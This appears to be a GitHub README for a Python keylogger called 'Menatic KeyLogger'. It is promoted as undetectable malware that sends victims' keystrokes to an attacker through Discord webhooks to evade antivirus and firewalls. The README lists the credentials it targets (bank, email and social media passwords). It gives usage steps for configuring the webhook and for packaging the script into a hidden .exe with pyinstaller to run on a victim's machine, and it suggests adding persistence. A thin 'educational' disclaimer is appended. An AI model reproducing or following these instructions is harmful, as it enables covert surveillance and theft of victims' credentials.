/Menatic_KeyLogger

Menatic Keylogger is a fully undetectable malware that will capture all keystrokes from a victim machine and use discord webhooks to transfer these keystrokes to the attacker machine, without causing anything suspicious to take place which will trigger anti-virus softwares. Discord webhooks will be considered as normal discord traffic, therefore this blends away our malicious activities even from network firewalls.

Primary LanguagePythonMIT LicenseMIT

Menatic KeyLogger

Python Version OS GitHub GitHub GitHub GitHub

unknown

Description

Menatic Keylogger is a fully undetectable malware that will capture all keystrokes from a victim machine and use discord webhooks to transfer these keystrokes to the attacker machine, without causing anything suspicious to take place which will trigger anti-virus softwares. Discord webhooks will be considered as normal discord traffic, therefore this blends away our malicious activities even from network firewalls.

  • All user logins and passwords
  • Bank passwords
  • social media account passwords
  • Emails sent to people
  • Complete reconnaissance of the victims day to day activities
  • Bypasses Windows Defender

Disclaimer !!!

The exploits and malware built on this respository are mainly for POC and Educational purposes only. The developer is in no way responsible for any sort of misuse of tools and exploits or spreading of malware from this respository.

Prerequisites

From the standard libraries.

  • datetime
  • threading
  • Timer
  • os

Not from the standard libraries.

  • discord-webhooks
  • keyboard

Installation

Usage

First make a discord server or use an existing one.

Create a seperate channel for this program.

Get your webhook url for that particular channel, if you dont know how to, there are many you tube videos.

Open the script with a text editor and paste the url under discord_webhooks_url on line 11.

To run this on the victim machine in the form of a python script do the following on the victim machine:

  • python3 menatickeylogger.py

To run this on the victim machine in the form of a .exe file, do the following before sending it to the victim:

  • pyinstaller <full_path_to_script> --onefile --noconsole

You should find your executable in the dest folder. You can now run the exe file in the victim machine.

Make your own changes to the file for it to gain persistence, we will not be covering that in detail because this is only a Proof of Concept

Built With

Points to Note:

  • You can also change the time of how fast you want to receive keystrokes on your discord server by changing the time_to_send_logs option, the unit of time being used is seconds.